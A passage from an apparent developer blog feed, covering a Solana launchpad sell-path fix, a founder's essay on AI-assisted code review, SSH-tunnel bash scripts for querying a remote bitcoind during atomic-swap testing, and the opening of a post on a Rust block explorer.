This was deliberate — minting compressed tokens for every microcap pump.fun-style trade would have wrecked the cost calculus that makes compressed tokens viable in the first place. Internal balances are a single u64 update in a PDA. Compressed-token mints are a Light Protocol state-tree write. The latter is dramatically more expensive. The trade-off was: at graduation time, the launchpad would convert internal balances to real compressed tokens via a `withdraw_token` + `compress` flow. Anyone who held an internal balance up to that moment got the conversion for free. The bug: the launch program's `sell_token` is gated by `is_active`. After graduation, `is_active = false`. The intended sell path is the AMM. But the AMM expects you to hold real compressed tokens, and a small cohort of users still had `internal_balance > 0` because they hadn't traded since graduation — meaning the conversion never fired for them. > Post-graduation, `sell_token` is blocked by `is_active` check and AMM `swap_tokens_for_sol` burn fails because users hold internal `UserPosition.token_balance` rather than actual compressed tokens. ([6eafc74 commit message](https://github.com/Dax911/z_trade/commit/6eafc742522038426443b2e77baaddd9fd9af77d)) ## Two ways to fix it, picked the second **Option A: redeploy the launchpad program with a `force_convert_on_sell` branch.** This is the obvious fix. It's also the wrong fix. A program redeploy: - Costs me real SOL on mainnet. - Risks a regression on the entire 12-launch live ecosystem. - Requires every active client to re-fetch the IDL. - Can't be reversed cleanly. **Option B: a frontend-only conversion path.** This is what I shipped. Three steps, all using existing on-chain instructions: 1. Call the launchpad's existing `withdraw_token` instruction. It mints SPL tokens from the `internal_balance` to the user's ATA, creating the ATA if needed. 2. Call Light Protocol's `compress` to convert the SPL ATA balance into real compressed tokens. 3. 
Hand control to the existing AMM `swap_tokens_for_sol` flow, which now sees compressed tokens and works as designed. From the diff:

```ts
// sdk/src/launchpad_client.ts
async convertInternalTokensToCompressed(
  user: PublicKey,
  tokenMint: PublicKey,
  amount: bigint,
  compressed: CompressedTokenHelper,
): Promise<string[]> {
  const txSigs: string[] = [];

  // Step 0 (rare): create the Light token pool if it doesn't exist.
  // Has to be its own tx because compress ix build-time requires the pool.
  const poolRegistered = await compressed.isTokenPoolRegistered(tokenMint);
  if (!poolRegistered) {
    const createPoolIx = await compressed.buildCreateTokenPoolInstruction(user, tokenMint);
    txSigs.push(await this.buildAndSendTransaction([createPoolIx]));
  }

  // Atomic tx: ensure ATA, withdraw_token (mint SPL), compress (burn SPL → cToken).
  // (ata / ataInfo are resolved earlier in the diff; elided in this excerpt)
  const convertIxs: TransactionInstruction[] = [];
  if (!ataInfo) convertIxs.push(createAssociatedTokenAccountInstruction(...));
  convertIxs.push(await this.program.methods.withdrawToken(new BN(amount.toString())).accounts({...}).instruction());
  convertIxs.push(await compressed.buildCompressInstruction(user, tokenMint, amount, user, ata));
  txSigs.push(await this.buildAndSendTransaction(convertIxs));

  return txSigs;
}
```

## The compute budget gotcha

Light Protocol operations need more than the default 200K compute units. The same diff bumps every transaction the launchpad client builds:

```ts
// Light Protocol operations need more than the default 200K CUs
transaction.add(
  ComputeBudgetProgram.setComputeUnitLimit({ units: 400_000 }),
);
```

This is the kind of thing that's "obvious" once you've spent half a day staring at `Custom program error: Program failed to complete` logs and finally noticed the CU exhaustion in the simulation output. Mine that lesson once, write it down, never lose it again. ## The follow-up: SDK exports I shipped the conversion path before the SDK exports were in place, which broke the Cloudflare build.
Fix landed in [`4224352` — `Add compress/decompress helpers to CompressedTokenHelper`](https://github.com/Dax911/z_trade/commit/4224352b36723fd3e03c14a4d06e87452c1222d8) eight minutes after the parent commit. The `launchpad_client` was importing `compressed.isTokenPoolRegistered`, `compressed.buildCreateTokenPoolInstruction`, `compressed.buildCompressInstruction` — none of which I'd actually exported on the helper class. Eight minutes is not a flex. CF Pages caught what my local typecheck didn't because I'd checked into the repo without re-running the SDK build. The lesson: any commit that adds a new public method on the SDK has to re-build the SDK barrel. CI for that is on my TODO list. ## Trade-offs **Why not migrate every stuck user automatically with a cron?** Two reasons. First, signing transactions on behalf of users without their explicit click is a regulatory and security minefield. Second, "stuck" is a reversible state — a user *can* trigger the conversion themselves. Forcing it for them spends gas they may not want to spend if they're holding for a longer time horizon than I am. **Why not deprecate internal balances entirely?** Because they're the entire economic argument for the launchpad. Deprecating them means every microcap trade pays Light Protocol state-tree write costs, and the flatness of the bonding curve breaks. The internal-balance design is correct; the conversion path was just incomplete. **Why frontend instead of a relayer service?** Because a relayer service is another piece of infrastructure to operate, monitor, and pay for. The frontend conversion is exactly two transactions worst-case (create pool + atomic convert), entirely user-signed, and it requires zero new servers. ## What this taught me The cheapest fix is the one that doesn't touch on-chain code. If your design lets you compose a fix entirely out of existing instructions on the frontend, it should always win over a redeploy. 
The ZeraSwap design happened to be composable enough that the stuck-sell case had a cheap exit. That wasn't free — it cost me a `state_tree` field I'd been religious about [from the original AMM commit](/blog/zeraswap_compressed_amm/), and it cost me writing the `convertInternalTokensToCompressed` orchestration in the SDK. But it didn't cost a redeploy or a regression test marathon. The other thing this taught me: the moment you have a launchpad with a graduation flow, you have at least three "intermediate" account states that look broken to users. Document every one of them in the admin page's docs tab. I should have done this on day one of [the prediction markets sprint](/blog/prediction_markets_admin/). I did it on day 60, after a Discord ping with the words "I can't sell." ## Further reading - [The bug-fix commit](https://github.com/Dax911/z_trade/commit/6eafc742522038426443b2e77baaddd9fd9af77d) - [The SDK exports follow-up](https://github.com/Dax911/z_trade/commit/4224352b36723fd3e03c14a4d06e87452c1222d8) - [Light Protocol — compress/decompress instructions](https://www.lightprotocol.com/) - [ZeraSwap origin post](/blog/zeraswap_compressed_amm/) - [Solana Compute Budget Program](https://docs.solana.com/developing/programming-model/runtime#compute-budget) --- # Being CEO and still shipping code Canonical: https://blog.skill-issue.dev/blog/being_ceo_and_still_shipping_code/ Description: The CTO-vs-CEO false dichotomy, why I still review every PR that touches the SDK core, and how I use Claude Code plus an MCP server over my own writing to keep technical leverage as the company grows. Published: 2026-04-18T08:00:00.000Z Tags: founders, leadership, ai, mcp, narrative, engineering-culture The advice founders get most often, once you cross the line from "engineer with a side project" to "engineer with a company," is: stop coding. Hire a CTO. Spend your time on customers and capital. Trust your team. The advice is not entirely wrong. It's just incomplete. 
Almost all of it is written by founders whose product was a SaaS dashboard or a marketplace. The product I'm shipping is a cryptographic SDK that has to interoperate, byte-for-byte, with an on-chain Rust program that itself has to interoperate with a Groth16 verifier whose constraint system has to match the prover's circuit. *Stop coding* is a luxury available to founders whose product is forgiving. Mine isn't. So I write code. I review every PR that touches the SDK core. I do not draft a single line of marketing copy without first having shipped something the marketing copy is allowed to be about. And — the part this post is mostly about — I have built an AI tooling layer that lets me hold that posture without becoming the bottleneck. ## The false dichotomy The version of "stop coding" that most founders absorb is something like: every hour you spend on code is an hour you're not spending on customers, capital, or hiring. The math, framed that way, is brutal. Ten hours of code is ten hours of *not closing the next round.* So stop. The math is wrong because the variables don't trade off the way it implies. The hours are not fungible. *My* hours of code are not the same as the next senior engineer's hours of code, in either direction. They are slower, because I context-switch more. They are more strategic, because I see the entire surface. They are more expensive per hour, because mine are also the hours that close customers. They are more *load-bearing*, because the parts of the codebase I touch tend to be the parts that determine whether the system is correct. The right way to do the math is: which hours of code create disproportionately more leverage downstream? For me, those are: - Architectural calls on the SDK boundary. (One hour. Saves the team thirty hours of refactor in two months.) - Reading every PR that touches `zera-core`. (Fifteen minutes per PR. Catches a bug class that would otherwise reach production.) 
- Writing the canonical example file when a new module ships. (Two hours. Replaces a documentation effort that would otherwise be much longer and worse.) - Drafting the technical content the company says, in public, that it stands behind. ([Most of the blog](/blog).) Those four buckets, in aggregate, are maybe 8–12 hours per week. The rest of the week is the actual CEO job. The mistake is picking either *all-code* or *no-code*. The right answer is *load-bearing code only*, and being honest about which is which. ## What I stopped doing For the record — the things I had to give up: - I do not pick up tickets in the SDK that aren't on the load-bearing path. The team is faster at them than I am. - I do not write tests anymore. Test coverage is a habit; tests are a downstream artifact of the habit. The team writes them and writes them well. - I do not own DX polish. Error messages, log formatting, CLI affordances — all owned by people who care more about them than I do at the moment. - I do not do code review on the wallet, the AMM, or the medical demo unless someone explicitly asks. Each of those has an owner whose taste I trust. - I do not personally set up the CI pipeline. (This was a hard one to give up. Give it up anyway.) The pattern: I stopped doing the things that, if I disappeared for a week, the company would still ship correctly. I kept doing the things that, if I disappeared for a week, the company would ship something subtly wrong. ## How AI fills the gap The reason this posture is workable in 2026 and was not workable in, say, 2019, is that the personal leverage you can build on top of an AI coding workflow is *the* difference between a working CEO-IC schedule and one that quietly destroys the company. I run two patterns and I think they're both worth describing. ### Pattern 1: Claude Code as a senior pair Most of my SDK reviews now happen with Claude Code in the loop. I don't mean "I ask the AI if the PR looks good." 
I mean: I read the PR; I write a short prompt summarising what I think is happening and what I'm worried about; the model walks the rest of the codebase to either confirm or refute my worry; I make my call. The leverage isn't in *doing* the review faster. The leverage is in being able to express, in one paragraph, the part of the codebase I'm worried about, and have an agent that can read that paragraph plus the entire rest of the codebase faster than I can. The review I do at the end is the same review I would have done. The *context-loading* is what I outsourced, and context-loading was 80% of the time cost. This works because Claude Code is good enough now to be *boring*. I don't have to phrase things magically. I write the review like I'd write it to a senior colleague. The model reads the whole repo and comes back with the cross-references I need. That's it. That's the workflow. ### Pattern 2: an MCP server over my own writing This is the one I get asked about more. I have three or four years of writing on this blog. There is, in that archive, the answer to most questions a reasonable person might ask me — *what's your stance on X, what was the architecture decision on Y, what's your bullet point on supply-chain attacks for an investor deck.* The thing is, when someone asks me one of those questions, the answer that ends up in my mouth is the *recent* answer, the one I happened to be thinking about that morning. The two-year-old version of me, who probably had a smarter take, doesn't get to vote. So I'm building (`TODO: Dax confirm exact ship date — Q2 2026`) **lib.skill-issue.dev**, an MCP server over the entire archive of this blog plus a small pinned set of references. It's a Cloudflare Worker. It uses Vectorize for retrieval and Workers AI for embedding. It exposes three or four tools to any MCP-aware client: `search`, `fetch`, `summarise`, `cite`. Every Claude Code session I run can hit it. 
Every customer call where I want to find the version of a take I had eighteen months ago can hit it. The point of building this is not that the world needs another personal RAG system. The point is that the company is going to grow, and the founder's writing is the cheapest possible scaling mechanism for *what the founder thinks*. The MCP server is the API I built so my own context isn't bottlenecked on me being awake. Same MCP pattern that ships in [zera-sdk's mcp-server](/blog/zera_sdk_scaffolding/), incidentally. We dogfood our own thesis. ## The team thing A short word on the part that doesn't fit cleanly into either of the patterns above. Being a technical CEO who still ships code only works if the team understands the *boundaries*. The team has to know which parts of the codebase are mine to push back on (the SDK core, the cryptographic surface, the visible API) and which parts are theirs (everything else, increasingly). If I drift into reviewing CI changes, I am *taking work away from people who are good at it*, and the message I'm sending is "your work isn't really yours." That's poison. So I draw a hard line. The architecture diagram of the SDK has my fingerprints on it. The CI pipeline has someone else's. The wallet's UI has someone else's. The Solana program has the person who wrote it. *Mine to push back on* is a small list, deliberately. The list is also visible to the team — they know what it is. This was harder to learn than I'd like to admit. I went through a phase where I was reviewing too many PRs because reviewing felt productive. The team got slower, not faster. The fix was to delete most of my review notifications and explicitly hand ownership of three subsystems to three people. Speed went up. My satisfaction went down for about two weeks and then went up permanently. 
## The shape of a week If you're curious how this actually allocates: a representative week, give or take, is roughly: - 8–12 hours: load-bearing code (per the bullets above) - 6–8 hours: customer + investor calls - 4–6 hours: 1:1s and team async (Linear, GitHub, Slack) - 4–6 hours: hiring loop (sourcing, screens, panels) - 2–4 hours: writing — public posts, [founder letters](/blog/why_i_started_zera_labs/), customer briefs - The rest: triage, email, the long tail of things a CEO has to look at. I don't believe in the heroic 80-hour week, but I do believe in the *consistent* 50–55-hour week, and I think this allocation is roughly that. `TODO: Dax adjust if reality drifts.` ## Why this is the post I keep getting asked for Every founder I talk to who came up technical wants permission to keep coding. The permission is, of course, theirs to give themselves — but the framing in the broader founder canon (the [Hard Thing](https://www.amazon.com/Hard-Thing-About-Things-Building/dp/0062273205), [High Output Management](https://www.amazon.com/High-Output-Management-Andrew-Grove/dp/0679762884)) is mostly written for SaaS founders whose products do not require their hands. Cryptographic infrastructure is not SaaS. The product is correct or it is not. The CEO of a company shipping correctness *should* keep their hands in the codebase. The trick is the AI-augmented workflow that makes the math work — context-loading via Claude Code, archive search via your own MCP server, and a hard list of subsystems where you, personally, are the last review. That's the entire post. Keep coding. Build the AI scaffolding around yourself that lets you keep coding. Stay out of the parts of the codebase that aren't yours. Trust the team on those parts. Be loud about which parts are yours. ## Further reading - [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the strategic backdrop for any of this to be worth doing. 
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — the canonical "load-bearing code only" session. - [Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/) — where the discipline to draw the boundaries came from. --- # btc-tunnel.sh: SSH-jumping into a remote bitcoind for swap testing Canonical: https://blog.skill-issue.dev/blog/vanta_btc_tunnel_dev_environment/ Description: Three small bash scripts wire the desktop dev environment to a real mainnet bitcoind for atomic-swap testing. Tunneling, RPC wrapping, and an address watcher with auto-reconnect — and why exposing 8332 to the internet is a worse idea than you think. Published: 2026-04-17T05:52:57.000Z Tags: vanta, bitcoin, ssh, tunnel, shell, devenv, rpc The atomic-swap CLI [I wrote about](/blog/vanta_swap_htlc_walkthrough/) needs two RPC endpoints: one for the VANTA chain (easy — there's a `vantad` running on the desktop dev box) and one for the BTC chain (less easy — I'm not running a full Bitcoin Core node on every laptop I develop on). The Bitcoin chain is real-money mainnet, and a Bitcoin Core full node is a 700+ GB and growing footprint that's too big to live on a developer machine in 2026. The answer that landed in commit [`e624a8e7`](https://github.com/Dax911/vanta/commit/e624a8e70) on 2026-04-17 — `desktop: scripts for BTC RPC tunnel + address watcher + rpc helper` — is three tiny shell scripts that forward a remote `bitcoind`'s RPC port to localhost over an SSH jump host, then wrap the JSON-RPC calls so the swap CLI can speak to a real mainnet node from any laptop. This post walks the three scripts, explains why they're written the way they are, and ends with an unkind paragraph about the alternative (just exposing port 8332 directly). 
## The scripts

There are three of them, all in [`vanta/vanta-desktop/scripts/`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-desktop/scripts):

- [`btc-tunnel.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-tunnel.sh) — set up / tear down / probe the SSH tunnel
- [`btc-rpc.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-rpc.sh) — make a single JSON-RPC call to the tunneled node
- [`btc-watch.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-watch.sh) — poll an address for state changes, with auto-reconnect

They are all `bash`, all `set -euo pipefail`, all under 100 lines. Code that looks like 1995. That's the right tool for what they do.

## btc-tunnel.sh: the SSH-jump forward

The architecture: my laptop sits on whatever Wi-Fi I'm on. The `bitcoind` runs at `10.0.1.89` on my home LAN. I can't reach `10.0.1.89` from a coffee shop. I can reach a public-facing jump host (a small VPS on a port I won't share publicly), and the jump host can reach the LAN. `ssh -J jump@public:port lan-host` does the routing. `ssh -L 8332:127.0.0.1:8332 lan-host` does the port forward. Combine them, daemonise the connection with `-f -N -M`, point a control socket at `/tmp/btc-tunnel.sock`, and you have a process you can `up`/`down`/`status` against from any shell. The full flag set, [from the script](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-tunnel.sh):

```bash
ssh_args=(
  -o StrictHostKeyChecking=accept-new
  -o IdentitiesOnly=yes
  -o ServerAliveInterval=30
  -o ServerAliveCountMax=3
  -o ExitOnForwardFailure=yes
  -i "$BTC_TUNNEL_KEY"
  -J "${JUMP_USER}@${JUMP_HOST}:${JUMP_PORT}"
  -L "${BTC_LOCAL_PORT}:127.0.0.1:${BTC_TUNNEL_RPC_PORT}"
  -S "$SOCKET"
)
```

Five of these flags are load-bearing. Let me unpack them. **`StrictHostKeyChecking=accept-new`.** This is the "trust on first use" mode. It accepts a new host key on first connection but refuses any later mismatch.
The strict setting (`yes`) would require pre-populating `known_hosts`; the permissive setting (`no`) would silently accept any host key, including a man-in-the-middle's. `accept-new` is the right middle ground for an interactive dev tool.

**`IdentitiesOnly=yes`.** Tells SSH to use *only* the key passed in `-i`, not whatever else is in `~/.ssh/`. Without this, SSH will try every key in your agent, exhaust the server's `MaxAuthTries`, and fail with a confusing error.

**`ServerAliveInterval=30` + `ServerAliveCountMax=3`.** Keep-alive every 30 seconds, kill the connection after 3 missed responses. A residential ISP will silently drop idle connections; this keeps the tunnel up for hours of intermittent use.

**`ExitOnForwardFailure=yes`.** If the local port bind fails — say something else is on `:8332` already — exit immediately rather than maintaining a half-broken tunnel that can't actually carry traffic. The default behavior (silently keep the SSH connection up but not the forward) is a great way to spend twenty minutes wondering why your RPC calls hang.

**`-S "$SOCKET"`.** Control socket. Lets a *separate* `ssh` invocation send commands to the same connection (`-O check`, `-O exit`). This is what makes `is_up()` work without parsing `ps` output:

```bash
is_up() {
  ssh -S "$SOCKET" -O check "$BTC_TUNNEL_HOST" >/dev/null 2>&1
}
```

That's the whole "is the tunnel alive" check. SSH manages it; we just ask.
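With the tunnel up, anything on the laptop that can POST to `127.0.0.1:8332` can drive the node — which is the whole point, because the swap CLI is just another JSON-RPC client. A TypeScript sketch of that client side (mine, not from the vanta repo; `rpcCall` and the env-var handling are illustrative, but the envelope and basic-auth shape match what the scripts below send):

```typescript
// Hypothetical client-side counterpart to the shell wrappers: JSON-RPC 1.0
// over HTTP basic auth, pointed at the tunneled local port.
const RPC_URL = process.env.BTC_RPC_URL ?? "http://127.0.0.1:8332";
const RPC_USER = process.env.BTC_RPC_USER ?? "user";
const RPC_PASS = process.env.BTC_RPC_PASS ?? "pass";

function buildRpcBody(method: string, params: unknown[] = []): string {
  // bitcoind speaks JSON-RPC 1.0; the id is echoed back for request matching
  return JSON.stringify({ jsonrpc: "1.0", id: "cli", method, params });
}

function buildAuthHeader(user: string, pass: string): string {
  return "Basic " + Buffer.from(`${user}:${pass}`).toString("base64");
}

async function rpcCall<T>(method: string, params: unknown[] = []): Promise<T> {
  const res = await fetch(RPC_URL, {
    method: "POST",
    headers: {
      "content-type": "text/plain",
      authorization: buildAuthHeader(RPC_USER, RPC_PASS),
    },
    body: buildRpcBody(method, params),
  });
  const { result, error } = (await res.json()) as { result: T; error: unknown };
  if (error) throw new Error(`bitcoind RPC ${method}: ${JSON.stringify(error)}`);
  return result;
}

// usage, with the tunnel up:
// const info = await rpcCall<{ blocks: number }>("getblockchaininfo");
```

Nothing here knows about SSH at all — that's the property the tunnel buys: the transport problem and the RPC problem stay in separate layers.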
## btc-tunnel.sh: the RPC probe Once the tunnel is up, the `status` command goes one step further — it actually makes an RPC call through the tunnel to verify the remote `bitcoind` is reachable and synced: ```bash probe_rpc() { curl -s --max-time 5 --user "${BTC_RPC_USER}:${BTC_RPC_PASS}" \ --data-binary '{"jsonrpc":"1.0","id":"s","method":"getblockchaininfo","params":[]}' \ -H 'content-type:text/plain;' "http://127.0.0.1:${BTC_LOCAL_PORT}/" } ``` The output gets parsed by an inline Python one-liner that prints the chain, block height, header height, sync state, and verification progress in one terse line. Why Python and not `jq`? Because `jq` isn't preinstalled on a fresh macOS, and Python 3 is. Portability wins over elegance here. The `getblockchaininfo` RPC is the standard "is this node alive and what does it know" call. If it returns a coherent JSON body, the tunnel is end-to-end working. If it doesn't, you get a clear error and you know which layer to debug — the SSH connection (tunnel up but RPC dead) or the local port (tunnel down, no RPC at all). ## btc-rpc.sh: the one-shot wrapper This one is so small it fits in the post: ```bash wallet_scoped=0 if [ "${1:-}" = "--wallet" ]; then wallet_scoped=1 shift fi method="${1:?method required}" params="${2:-[]}" path="" [ "$wallet_scoped" = "1" ] && path="/wallet/${BTC_RPC_WALLET}" curl -s --user "${BTC_RPC_USER}:${BTC_RPC_PASS}" \ --data-binary "{\"jsonrpc\":\"1.0\",\"id\":\"cli\",\"method\":\"${method}\",\"params\":${params}}" \ -H 'content-type:text/plain;' \ "${BTC_RPC_URL}${path}" | python3 -m json.tool ``` The whole point is to give me a one-line shorthand for `bitcoind` debugging that doesn't require remembering the JSON-RPC envelope. 
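The envelope the wrapper assembles is worth seeing on its own. A Python sketch of the same construction (a hypothetical helper that mirrors the script's string interpolation):

```python
import json

def build_rpc_call(method, params="[]", wallet=None,
                   base_url="http://127.0.0.1:8332"):
    """Mirror btc-rpc.sh: the body is a JSON-RPC 1.0 envelope, and
    wallet-scoped calls get a /wallet/<name> path suffix
    (the Bitcoin Core >= 0.18 routing convention)."""
    path = "/wallet/%s" % wallet if wallet else ""
    body = ('{"jsonrpc":"1.0","id":"cli","method":"%s","params":%s}'
            % (method, params))
    return base_url + path, body

url, body = build_rpc_call("getbalance", wallet="swap")
assert url.endswith("/wallet/swap")
assert json.loads(body) == {"jsonrpc": "1.0", "id": "cli",
                            "method": "getbalance", "params": []}
```

Note that `params` is spliced in as raw JSON text, exactly as the bash version does; the caller is responsible for passing a valid JSON array.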
From any shell with the tunnel up: ```bash $ btc-rpc.sh getblockchaininfo $ btc-rpc.sh --wallet getbalance $ btc-rpc.sh --wallet getnewaddress '["swap-test","bech32"]' $ btc-rpc.sh getrawtransaction '["", true]' ``` The `--wallet` flag is the difference between core RPCs (chain state, mempool) and wallet-scoped RPCs (balance, send, sign). Bitcoin Core changed the RPC URL convention in v0.18 — wallet RPCs route to `/wallet/`, core RPCs route to `/`. The wrapper handles that distinction by setting `path` and concatenating it onto `BTC_RPC_URL`. The `python3 -m json.tool` at the end is a pretty-printer. Two seconds of latency on the JSON pretty-print is the right amount of overhead for terminal readability. ## btc-watch.sh: the address watcher This is the one I use most. When you're testing an HTLC, you fund a P2WSH output, broadcast the funding transaction, wait for it to confirm, then build the spending transaction. "Wait for it to confirm" is what `btc-watch.sh` automates: ```bash addr="${1:?address required — see usage in header}" log="${2:-/tmp/btc-watch.log}" last_state="" while true; do ensure_tunnel resp=$(rpc listunspent "[0, 9999999, [\"${addr}\"]]" || echo '{}') state=$(echo "$resp" | python3 -c " import sys,json try: r = json.load(sys.stdin).get('result') or [] if not r: print('EMPTY'); sys.exit() parts = ['%s|%.8f|%d' % (u['txid'], u['amount'], u['confirmations']) for u in r] print(';'.join(sorted(parts))) except Exception as e: print('ERR:'+str(e)) ") if [ "$state" != "$last_state" ]; then # log + display the change last_state="$state" fi sleep "$BTC_WATCH_INTERVAL" done ``` Three design choices in here that took longer than they should have to get right. **`listunspent` with `minconf=0`.** Includes mempool. The HTLC funding transaction shows up *first* in the mempool with `confirmations=0`, then gains confirmations as blocks are mined. You want to know about both states. 
The default `listunspent` arguments are `[1, 9999999]` (confirmed-only); we override with `[0, 9999999, [addr]]` to include mempool and filter by address. **State diffing.** The watcher prints when the state *changes*, not on every poll. Otherwise the log is unreadable. The state representation is `txid|amount|confirmations`, joined with `;` and sorted. Sorted because `listunspent` doesn't guarantee output order; without sorting, two consecutive polls of the same UTXO set could produce different state strings. **`ensure_tunnel`.** Before each RPC poll, check that the tunnel's still up. If it's not, try to bring it back up: ```bash ensure_tunnel() { if rpc getblockcount '[]' '' >/dev/null 2>&1; then return 0; fi log_line "rpc unreachable — attempting tunnel up" if [ -x "${HERE}/btc-tunnel.sh" ]; then "${HERE}/btc-tunnel.sh" up || log_line "tunnel up failed" else log_line "btc-tunnel.sh not found next to this script; cannot auto-reconnect" fi sleep 2 } ``` The script is supposed to run for hours during a long swap test. If my coffee shop's Wi-Fi drops and reconnects, the tunnel breaks. Without `ensure_tunnel`, the watcher would silently fail every 10 seconds. With it, the tunnel comes back up automatically and the polling resumes. The first time this saved me a swap test was the moment I knew the script was worth committing. ## On exposing 8332 directly > **WARNING:** Do not put port 8332 on the public internet. Do not put it on a "VPN-only" subnet that you can't audit. Do not assume rate-limiting at your router is enough. If you read tutorials online — I have, you have, we all have — you'll find advice that says "just expose your bitcoind RPC port through your router." This is bad advice, and I'm going to be direct about why. The bitcoind RPC exposes wallet operations behind HTTP basic auth. If `RPCPASSWORD` ever leaks (in a CI log, in a screenshot, in a `.env` file in a git history, in a commit message) the attacker has full access to your wallet. 
They can sign transactions. They can drain your funds. There is no "I locked my wallet" safety net here — the unlock is part of the same RPC and it accepts a passphrase that can also be brute-forced once the connection is open. Even with no wallet, the RPC exposes call patterns that can be used to fingerprint your node, drain its mempool data, and probe for vulnerabilities. Bitcoin Core has a hardening guide for a reason.

The SSH tunnel architecture solves all of this in one move. The RPC port is bound to `127.0.0.1` on the bitcoind host. The only path to it is over an authenticated SSH connection. The jump host doesn't see the RPC traffic — it sees only the encrypted SSH stream. Your laptop talks to the jump host using key-based auth (the `IdentitiesOnly` flag). The RPC password lives in `.env.local` and never leaves your machine.

If you don't have a jump host *available*, the second-best option is to run a separate `bitcoind` in `regtest` mode, just for the development workflow. Mainnet RPC should not be on a public IP. Ever.

## Pulling it together: a swap test

The end-to-end swap-test flow looks like this, on a fresh terminal:

```bash
# 1. Bring up the tunnel.
$ ./btc-tunnel.sh up
tunnel up: 127.0.0.1:8332 -> dax@10.0.1.89:8332

# 2. Sanity check.
$ ./btc-tunnel.sh status
forward: 127.0.0.1:8332 -> dax@10.0.1.89:8332
chain=main blocks=874632 headers=874632 synced=True progress=1.000000

# 3. Generate a fresh receiving address for the swap.
$ ./btc-rpc.sh --wallet getnewaddress '["swap-test","bech32"]'
"bc1qjh9pjnqs5486d08yg4aafdlphwl3rc6ls0lf7w"

# 4. Start watching the address in another window.
$ ./btc-watch.sh bc1qjh9pjnqs5486d08yg4aafdlphwl3rc6ls0lf7w &

# 5. Run the swap CLI from a third window.
$ vanta-swap participate --amount 0.001 --hash ...
```

The watcher logs the funding transaction the moment it hits the mempool, and again every time it gains a confirmation. The CLI broadcasts the spending transaction.
The watcher logs the spend. That whole loop takes about 30 seconds end to end on a happy path on mainnet. Without the tunnel scripts, it'd take twenty minutes per iteration of fumbling with `bitcoin-cli` arguments and SSH commands.

## What I changed my mind about

I wrote the first version of `btc-tunnel.sh` as a one-liner pasted into Notion. It worked. I copy-pasted it dozens of times before I realised that `ssh` would silently exit if the home host was momentarily unreachable, leaving me typing into a tunneled port that wasn't listening to anything. The version that ships does three things the one-liner didn't: it uses a control socket so `is_up` is reliable, it sets `ExitOnForwardFailure` so the script crashes loudly instead of locking up, and it has a `restart` subcommand because manually re-running `up` after a network drop is the kind of friction that makes you stop using the tool.

The general lesson — and this is the kind of thing I'd put in a "scripts I keep around" post — is that the dev tools you use *daily* deserve the same care you give production code. Not the same test coverage. But the same observability. A 60-line bash script with `set -euo pipefail`, control sockets, and a clear `status` mode is a different beast from a 60-line bash script that just `ssh`s and prays.
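As a coda to the state-diffing point above: the watcher's state-string computation as a standalone Python function, same logic as the inline `python3 -c` snippet, easier to test in isolation:

```python
def utxo_state(result):
    """Canonical state string for a listunspent result: sorted
    txid|amount|confirmations parts, ';'-joined. Sorting makes the
    string independent of listunspent's (unspecified) output order."""
    if not result:
        return "EMPTY"
    parts = ["%s|%.8f|%d" % (u["txid"], u["amount"], u["confirmations"])
             for u in result]
    return ";".join(sorted(parts))

a = [{"txid": "aa", "amount": 0.001, "confirmations": 0},
     {"txid": "bb", "amount": 0.002, "confirmations": 1}]
# The same UTXO set in a different order yields the same state string,
# so the watcher only logs genuine changes.
assert utxo_state(a) == utxo_state(list(reversed(a)))
assert utxo_state([]) == "EMPTY"
```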
## Further reading - [`vanta/vanta-desktop/scripts/btc-tunnel.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-tunnel.sh) — the tunnel script - [`vanta/vanta-desktop/scripts/btc-rpc.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-rpc.sh) — the RPC wrapper - [`vanta/vanta-desktop/scripts/btc-watch.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-watch.sh) — the address watcher - [Bitcoin Core's `bitcoin.conf` reference](https://github.com/bitcoin/bitcoin/blob/master/doc/bitcoin-conf.md) — every flag in the default config - [BIP-199 by hand](/blog/vanta_swap_htlc_walkthrough/) — the swap CLI these scripts support - [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the dev workflow these scripts plug into --- # Block explorers for privacy chains: a Rust indexer for vanta Canonical: https://blog.skill-issue.dev/blog/vanta_explorer_rust_indexer/ Description: Patching btc-rpc-explorer got us to 'works.' Then we wrote vanta-explorer in Rust + React: an Axum backend, SQLite indexer, and a SPA that renders shielded transfers as opaque commitments without lying about what it knows. Published: 2026-04-13T17:34:24.000Z Tags: vanta, rust, explorer, axum, react, privacy When you're forking Bitcoin Core, you can't get away with not having a block explorer. People will ask you for one within hours of finding out the chain exists. So Vanta has had two: the [patched `btc-rpc-explorer`](https://github.com/Dax911/vanta/tree/main/explorer) (Node.js, the original "works in a weekend" answer) and the from-scratch [`vanta-explorer`](https://github.com/Dax911/vanta/tree/main/vanta-explorer) (Rust + React, the "actually models a privacy chain correctly" answer). This post is about how we got from one to the other. 
The interesting question isn't "how do you write an explorer" — that's well-trodden — it's "how do you write a *privacy* explorer that displays opaque commitments without misrepresenting what it knows."

## Phase one: patch btc-rpc-explorer

The first explorer was a 5-day patch on top of [`janoside/btc-rpc-explorer`](https://github.com/janoside/btc-rpc-explorer). The diff is in [`explorer/`](https://github.com/Dax911/vanta/tree/main/explorer) and the work was mostly: rename strings (`bitcoin` → `vanta` everywhere), swap currency labels (BTC → VANTA, sat → zat), point at `vantad` instead of `bitcoind`, fix the mining-template URL, and update the favicon. The 2026-04-13 commit log shows the rebrand pass:

```
de8efe0b explorer: rebrand patches zeracoin -> vanta
```

This explorer was Node.js, shipped a multi-megabyte `node_modules`, and rendered transactions as transparent UTXOs because that's what its templates were built for. Witness v2 commitments showed up in the UI as `value: 0.0` outputs of type `witness_unknown`, which is technically accurate but extremely useless. A user looking at our chain through this explorer saw transactions and concluded "all the value is in coinbase outputs." Wrong, *but the explorer wasn't lying* — it was just showing what its model of "transaction" knew how to show. The real value lived in commitments outside its model.

## Phase two: write a Rust explorer

